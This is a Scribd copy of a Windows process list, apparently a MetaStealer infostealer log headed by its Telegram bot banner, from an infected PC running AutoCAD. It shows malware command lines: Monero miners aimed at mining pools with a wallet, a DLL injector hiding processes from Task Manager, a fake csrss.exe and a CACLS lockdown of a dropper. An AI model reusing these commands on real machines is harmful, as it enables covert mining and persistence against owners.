Scribd
Upload
46 views6 pages

Process List

The document lists process and program information running on a system including process IDs, names, and command lines. Many of the processes are related to Windows and browser functionality while others indicate potentially unwanted programs are running.

Uploaded by

blackcaliber44
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
46 views6 pages

Process List

The document lists process and program information running on a system including process IDs, names, and command lines. Many of the processes are related to Windows and browser functionality while others indicate potentially unwanted programs are running.

Uploaded by

blackcaliber44
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 6

***********************************************

* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************

ID: 628, Name: csrss.exe, CommandLine:


===============
ID: 808, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 952, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1040, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 1340, Name: atieclxx.exe, CommandLine: atieclxx
===============
ID: 3992, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 4020, Name: svchost.exe, CommandLine: c:\windows\system32\svchost.exe -k
unistacksvcgroup -s CDPUserSvc
===============
ID: 4052, Name: svchost.exe, CommandLine: c:\windows\system32\svchost.exe -k
unistacksvcgroup -s WpnUserService
===============
ID: 1128, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 4284, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 4476, Name: explorer.exe, CommandLine: C:\WINDOWS\Explorer.EXE
===============
ID: 5060, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 4352, Name: SearchUI.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -
ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
===============
ID: 3880, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 5196, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 5480, Name: SkypeBackgroundHost.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.SkypeApp_14.56.102.0_x64__kzf8qxf38zg5c\
SkypeBackgroundHost.exe" -ServerName:SkypeBackgroundHost
===============
ID: 5496, Name: ApplicationFrameHost.exe, CommandLine: C:\WINDOWS\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 5904, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 1360, Name: MSASCuiL.exe, CommandLine: "C:\Program Files\Windows Defender\
MSASCuiL.exe"
===============
ID: 6716, Name: OneDrive.exe, CommandLine: "C:\Users\User\AppData\Local\Microsoft\
OneDrive\OneDrive.exe" /background
===============
ID: 7556, Name: svcservice.exe, CommandLine: "C:\Users\User\AppData\Roaming\
telemetry\svcservice.exe"
===============
ID: 7652, Name: oneetx.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
10180c8ca3\oneetx.exe"
===============
ID: 7704, Name: AutodeskDesktopApp.exe, CommandLine: "C:\Program Files (x86)\
Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe" -tray
===============
ID: 7724, Name: GenuineService.exe, CommandLine: "C:\ProgramData\Autodesk\Genuine
Service\x64\GenuineService.exe"
===============
ID: 7776, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files (x86)\Autodesk\
Autodesk Desktop App\acwebbrowser\acwebbrowser.exe" --approot=SOFTWARE\Autodesk --
appAgent=/AUTODESKDESKTOPAPP/8.5.0.17/es-ES/0001 --lang=es-ES --cache-path="C:\
Users\User\AppData\Local\Autodesk\Autodesk Desktop App\BrowserCache" --peerPid=7704

===============
ID: 7960, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files (x86)\Autodesk\
Autodesk Desktop App\acwebbrowser\acwebbrowser.exe" --type=gpu-process --
channel="7776.0.1937806387\744104333" --no-sandbox --lang=es-ES --log-file="C:\
Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\debug.log" --log-
severity=disable --peerpid=7704 --disable-direct-composition --supports-dual-
gpus=false --gpu-driver-bug-workarounds=4,12,13,25,54 --gpu-vendor-id=0x1002 --gpu-
device-id=0x6810 --gpu-driver-vendor="Advanced Micro Devices, Inc." --gpu-driver-
version=22.19.162.4 --lang=es-ES --log-file="C:\Program Files (x86)\Autodesk\
Autodesk Desktop App\acwebbrowser\debug.log" --log-severity=disable --peerpid=7704
--mojo-platform-channel-handle=1300 /prefetch:2
===============
ID: 8044, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files (x86)\Autodesk\
Autodesk Desktop App\acwebbrowser\acwebbrowser.exe" --type=renderer --no-sandbox --
primordial-pipe-token=9DB26E3B0071B6FB128A472BD455CFCF --lang=en-US --lang=es-ES --
log-file="C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\
debug.log" --log-severity=disable --peerpid=7704 --enable-pinch --device-scale-
factor=1 --num-raster-threads=2 --content-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
video-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
channel="7776.1.460668884\194047198" --mojo-platform-channel-handle=1896
/prefetch:1
===============
ID: 8052, Name: mstsca.exe, CommandLine: C:\Users\User\AppData\Roaming\Microsoft\
Network\mstsca.exe
===============
ID: 7204, Name: oneetx.exe, CommandLine: C:\Users\User\AppData\Local\Temp\
cb7ae701b3\oneetx.exe
===============
ID: 5960, Name: cmd.exe, CommandLine: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS
"oneetx.exe" /P "User:N"&&CACLS "oneetx.exe" /P "User:R" /E&&echo Y|CACLS "..\
cb7ae701b3" /P "User:N"&&CACLS "..\cb7ae701b3" /P "User:R" /E&&Exit
===============
ID: 5532, Name: acad.exe, CommandLine: "C:\Program Files\Autodesk\AutoCAD 2018\
acad.exe" /product ACAD /language "es-ES"
===============
ID: 7628, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 4004, Name: svchost.exe, CommandLine: c:\windows\system32\svchost.exe -k
unistacksvcgroup
===============
ID: 7040, Name: OpenWith.exe, CommandLine: C:\WINDOWS\system32\OpenWith.exe -
Embedding
===============
ID: 7544, Name: SkypeApp.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.SkypeApp_14.56.102.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -
ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca
===============
ID: 8768, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9308, Name: WRlr93jfY6F2v8kcgnz_9dEN.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\WRlr93jfY6F2v8kcgnz_9dEN.exe"
===============
ID: 7548, Name: csrss.exe, CommandLine: C:\WINDOWS\rss\csrss.exe
===============
ID: 8856, Name: injector.exe, CommandLine: C:\Users\User\AppData\Local\Temp\csrss\
injector\injector.exe taskmgr.exe C:\Users\User\AppData\Local\Temp\csrss\injector\
NtQuerySystemInformationHook.dll
===============
ID: 7640, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 9088, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 9740, Name: vbc.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\
v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5
vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
===============
ID: 6832, Name: dSBtq.exe, CommandLine: C:\Users\User\AppData\Local\c9f346a0-b2de-
4370-961e-ea0e586137ce\dSBtq.exe --Task
===============
ID: 6824, Name: explorer.exe, CommandLine: C:\WINDOWS\SysWOW64\explorer.exe
===============
ID: 10236, Name: explorer.exe, CommandLine: C:\WINDOWS\explorer.exe
===============
ID: 3248, Name: explorer.exe, CommandLine: C:\WINDOWS\SysWOW64\explorer.exe
===============
ID: 2560, Name: explorer.exe, CommandLine: C:\WINDOWS\explorer.exe
===============
ID: 9672, Name: explorer.exe, CommandLine: C:\WINDOWS\SysWOW64\explorer.exe
===============
ID: 3320, Name: explorer.exe, CommandLine: C:\WINDOWS\SysWOW64\explorer.exe
===============
ID: 452, Name: explorer.exe, CommandLine: C:\WINDOWS\SysWOW64\explorer.exe
===============
ID: 8988, Name: explorer.exe, CommandLine: C:\WINDOWS\explorer.exe
===============
ID: 6500, Name: explorer.exe, CommandLine: C:\WINDOWS\SysWOW64\explorer.exe
===============
ID: 9640, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 6324, Name: wup.exe, CommandLine: C:\Users\User\AppData\Local\Temp\csrss\wup\
xarch\wup.exe -o dxpools.net:40001 --rig-id 0ebea37d-a215-4e4b-8e3a-7eef19c4bace --
tls --nicehash -o dxpools.net:443 --rig-id 0ebea37d-a215-4e4b-8e3a-7eef19c4bace --
tls --nicehash -o dxpools.net:80 --rig-id 0ebea37d-a215-4e4b-8e3a-7eef19c4bace --
nicehash --http-port 3433 --http-access-token 0ebea37d-a215-4e4b-8e3a-7eef19c4bace
--randomx-wrmsr=-1
===============
ID: 9660, Name: FDTSH0DLi5H1_wAgQLp7PBti.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\FDTSH0DLi5H1_wAgQLp7PBti.exe"
===============
ID: 7684, Name: acad.exe, CommandLine: "C:\Program Files\Autodesk\AutoCAD 2018\
acad.exe"
===============
ID: 6040, Name: acwebbrowser.exe, CommandLine: "C:\Program Files\Common Files\
Autodesk Shared\CLM\V5\MSVC14\cliccore\acwebbrowser.exe" -approot=\SOFTWARE\
Autodesk\Clm\ -extension=ClicJsBrowserExtensions.dll -interopid=000002859C5A8B50
--force-device-scale-factor=1 --peerPid=7684
===============
ID: 9108, Name: acwebbrowser.exe, CommandLine: "C:\Program Files\Common Files\
Autodesk Shared\CLM\V5\MSVC14\cliccore\acwebbrowser.exe" --type=gpu-process --
channel="6040.0.1208888166\1964452983" --no-sandbox --lang=en-US --log-file="C:\
Program Files\Common Files\Autodesk Shared\CLM\V5\MSVC14\cliccore\debug.log" --log-
severity=disable --peerpid=7684 --extension="C:\Program Files\Common Files\Autodesk
Shared\CLM\V5\MSVC14\cliccore\ClicJsBrowserExtensions.dll" --
interopid=000002859C5A8B50 --disable-direct-composition --supports-dual-gpus=false
--gpu-driver-bug-workarounds=4,12,13,25,54 --gpu-vendor-id=0x1002 --gpu-device-
id=0x6810 --gpu-driver-vendor="Advanced Micro Devices, Inc." --gpu-driver-
version=22.19.162.4 --lang=en-US --log-file="C:\Program Files\Common Files\Autodesk
Shared\CLM\V5\MSVC14\cliccore\debug.log" --log-severity=disable --peerpid=7684 --
extension="C:\Program Files\Common Files\Autodesk Shared\CLM\V5\MSVC14\cliccore\
ClicJsBrowserExtensions.dll" --interopid=000002859C5A8B50 --mojo-platform-channel-
handle=1340 /prefetch:2
===============
ID: 7152, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files\Autodesk\AutoCAD
2018\acwebbrowser\acwebbrowser.exe" --appRoot=Software\Autodesk\AutoCAD\R22.0\ACAD-
1001:40A\Applications --appAgent=Autodesk/ACAD/22.0/es-ES/1001 --lang=es-ES --
cache-path="C:\Users\User\AppData\Local\Autodesk\AutoCAD 2018\R22.0\esp\
BrowserCache" --peerPid=7684
===============
ID: 5504, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files\Autodesk\AutoCAD
2018\acwebbrowser\acwebbrowser.exe" --type=gpu-process --
channel="7152.0.1281999637\632044022" --no-sandbox --lang=es-ES --log-file="C:\
Program Files\Autodesk\AutoCAD 2018\acwebbrowser\debug.log" --log-severity=disable
--peerpid=7684 --disable-direct-composition --supports-dual-gpus=false --gpu-
driver-bug-workarounds=4,12,13,25,54 --gpu-vendor-id=0x1002 --gpu-device-id=0x6810
--gpu-driver-vendor="Advanced Micro Devices, Inc." --gpu-driver-version=22.19.162.4
--lang=es-ES --log-file="C:\Program Files\Autodesk\AutoCAD 2018\acwebbrowser\
debug.log" --log-severity=disable --peerpid=7684 --mojo-platform-channel-
handle=1284 /prefetch:2
===============
ID: 8524, Name: acwebbrowser.exe, CommandLine: "C:\Program Files\Common Files\
Autodesk Shared\CLM\V5\MSVC14\cliccore\acwebbrowser.exe" --type=renderer --force-
device-scale-factor=1 --no-sandbox --disable-databases --primordial-pipe-
token=FB9C41D7E74C4216D023372C73D5AE4B --lang=en-US --lang=en-US --log-file="C:\
Program Files\Common Files\Autodesk Shared\CLM\V5\MSVC14\cliccore\debug.log" --log-
severity=disable --peerpid=7684 --extension="C:\Program Files\Common Files\Autodesk
Shared\CLM\V5\MSVC14\cliccore\ClicJsBrowserExtensions.dll" --
interopid=000002859C5A8B50 --enable-pinch --device-scale-factor=1 --num-raster-
threads=2 --content-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
video-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
channel="6040.1.171533669\563851143" --mojo-platform-channel-handle=1844
/prefetch:1
===============
ID: 6328, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files\Autodesk\AutoCAD
2018\acwebbrowser\acwebbrowser.exe" --type=renderer --no-sandbox --primordial-pipe-
token=420A3CE620467D2E62E3699DD415E2A0 --lang=en-US --lang=es-ES --log-file="C:\
Program Files\Autodesk\AutoCAD 2018\acwebbrowser\debug.log" --log-severity=disable
--peerpid=7684 --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --
content-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
video-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
channel="7152.1.679279066\1950648157" --mojo-platform-channel-handle=1248
/prefetch:1
===============
ID: 9908, Name: AcHelp2.exe, CommandLine: "C:\Program Files\Common Files\Autodesk
Shared\AcHelp2.exe" /Automation -Embedding
===============
ID: 1656, Name: AcWebBrowser.exe, CommandLine: "C:\Program Files\Autodesk\AutoCAD
2018\acwebbrowser\acwebbrowser.exe" --type=renderer --no-sandbox --primordial-pipe-
token=03AE9E469A24EFB5D199F469EEFCD421 --lang=en-US --lang=es-ES --log-file="C:\
Program Files\Autodesk\AutoCAD 2018\acwebbrowser\debug.log" --log-severity=disable
--peerpid=7684 --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --
content-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
video-image-texture-
target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --
channel="7152.3.2032955003\1482132004" --mojo-platform-channel-handle=3404
/prefetch:1
===============
ID: 6748, Name: SWyxXAL3aA0H8OArgi0xqYXq.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\SWyxXAL3aA0H8OArgi0xqYXq.exe"
===============
ID: 1384, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegSvcs.exe"
===============
ID: 1112, Name: 934057bb263593087d4cce4817adb057.exe, CommandLine: C:\Users\User\
AppData\Local\Temp\csrss\934057bb263593087d4cce4817adb057.exe
===============
ID: 9528, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 8204, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegSvcs.exe"
===============
ID: 8008, Name: DVbTMCiVq9nJoGROzZZCPO7Z.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\DVbTMCiVq9nJoGROzZZCPO7Z.exe"
===============
ID: 10212, Name: OV27PXY0AvduG2i2myf55Hga.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\OV27PXY0AvduG2i2myf55Hga.exe"
===============
ID: 472, Name: is-O7JTK.tmp, CommandLine: "C:\Users\User\AppData\Local\Temp\is-
2JOBS.tmp\is-O7JTK.tmp" /SL4 $D0400 "D:\Documents\Pictures\Minor Policy\
DVbTMCiVq9nJoGROzZZCPO7Z.exe" 2562561 56320
===============
ID: 2500, Name: Rec419.exe, CommandLine: "C:\Program Files (x86)\FKDsoftFR\Rec419\
Rec419.exe"
===============
ID: 8148, Name: Vyd_pkJfkheUyRurbhlHef0U.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\Vyd_pkJfkheUyRurbhlHef0U.exe"
===============
ID: 7024, Name: bjlk_7b_S9vJXUko_9mHwiFQ.exe, CommandLine: "D:\Documents\Pictures\
Minor Policy\bjlk_7b_S9vJXUko_9mHwiFQ.exe"
===============
ID: 2932, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 3560, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 8380, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929535733
===============
ID: 2412, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "525403"
===============
ID: 1944, Name: gpupdate.exe, CommandLine: "C:\WINDOWS\system32\gpupdate.exe"
/force
===============
ID: 1428, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4

You might also like